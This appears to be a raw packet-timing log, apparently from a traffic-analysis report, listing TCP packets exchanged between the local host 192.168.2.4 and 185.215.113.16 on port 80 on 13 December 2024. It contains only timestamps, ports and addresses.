                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.048111916 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.048203945 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.048846006 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.048935890 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.049007893 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.049870968 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.049918890 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.050012112 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.050057888 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.050836086 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.051002026 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.051969051 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.052036047 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.052346945 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.052438021 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.052489042 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.052829981 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.052952051 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.053814888 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.053905010 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.053935051 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.054034948 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.054784060 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.054828882 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.054872990 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.054915905 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.055769920 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.055866957 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.055892944 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.055917978 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.056796074 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.056936979 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.057775974 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.057863951 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.058744907 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.058820963 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.059705019 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.059896946 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.060712099 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.060817003 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.061690092 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.061769962 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.061981916 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.062689066 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.062803030 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.063652039 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.063733101 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.064629078 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.064779043 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.065614939 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.065742016 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.066617012 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.066724062 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.067655087 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.067733049 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.068579912 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.068675041 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.069636106 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.069704056 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.070563078 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.070669889 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.071523905 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.071644068 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.071686029 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.071809053 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.071825981 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.072530985 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.072571039 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.072626114 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.072685003 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.073532104 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.073612928 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.073674917 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.073945999 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.074527025 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.074703932 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.074824095 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.075525999 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.075572968 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.075656891 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.075700045 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.076505899 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.076569080 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.076601028 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.076634884 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.077461004 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.077517986 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.078336954 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.078454971 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.078574896 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.079446077 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.079574108 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.080418110 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.080524921 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.081388950 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.081573009 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.081945896 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.082154036 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.082402945 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.082458973 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.083010912 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.083375931 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.083455086 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.223789930 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.223824024 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.224046946 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.224275112 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.224400043 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.224409103 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.224728107 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.225243092 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.225285053 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.225940943 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.226150036 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.226317883 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.226329088 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.226398945 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.227224112 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.227272034 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.227345943 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.227386951 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.228130102 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.228176117 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.228257895 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.228334904 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.229113102 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.229166031 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.230086088 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.230225086 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.231072903 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.231210947 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.232251883 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.232415915 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.233078003 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.233268023 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.234074116 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.234174013 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.235044003 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.235209942 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.236005068 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.236129045 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.237087011 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.237102032 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.237999916 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.238137007 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.238991976 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.239120960 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.239986897 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.240144968 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.240942955 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.241033077 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.241902113 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.242031097 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.242954969 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.243092060 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.243648052 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.243856907 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.244013071 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.244667053 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.244695902 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.244695902 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.244716883 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.244899988 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.244967937 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.245069027 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.245868921 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.245978117 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.246881962 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.246988058 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.247899055 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.247935057 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.248840094 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.248951912 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.249802113 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.249911070 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.250797033 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.250897884 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.251852036 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.251996040 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.252791882 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.252873898 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.253771067 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.253808022 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.253817081 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.254177094 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.254220009 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.254232883 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.254743099 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.254822969 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.255721092 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.255815983 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.256731987 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.256839037 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.257800102 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.257939100 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.258712053 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.258826017 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.259884119 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.259915113 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.260668039 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.260778904 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.261712074 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.261795998 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.262651920 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.262716055 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.263767004 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.263819933 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.263951063 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.264667988 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.264683962 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.264792919 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.264857054 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.265083075 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.265583992 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.265710115 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.266558886 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.266690016 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.267544985 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.267668962 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.268536091 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.268646955 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.269733906 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.269799948 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.270567894 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.270664930 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.271509886 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.271611929 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.272486925 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.272586107 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.273439884 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.273555040 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.274739027 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.274866104 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.275507927 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.284121990 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.285640955 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.285655022 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.416260004 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.416361094 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.416671038 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.416941881 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.417701006 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.417820930 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.418571949 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.418662071 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.419547081 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.419647932 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.420532942 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.420660973 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.421482086 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.421608925 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.422512054 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.422657013 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.423499107 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.423572063 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.424484968 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.424581051 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.425473928 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.425609112 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.426569939 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.426666975 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.427545071 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.427601099 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.428512096 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.428636074 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.429423094 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.429511070 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.430459023 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.430530071 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.431413889 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.431508064 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:47.432364941 CET8049840185.215.113.16192.168.2.4
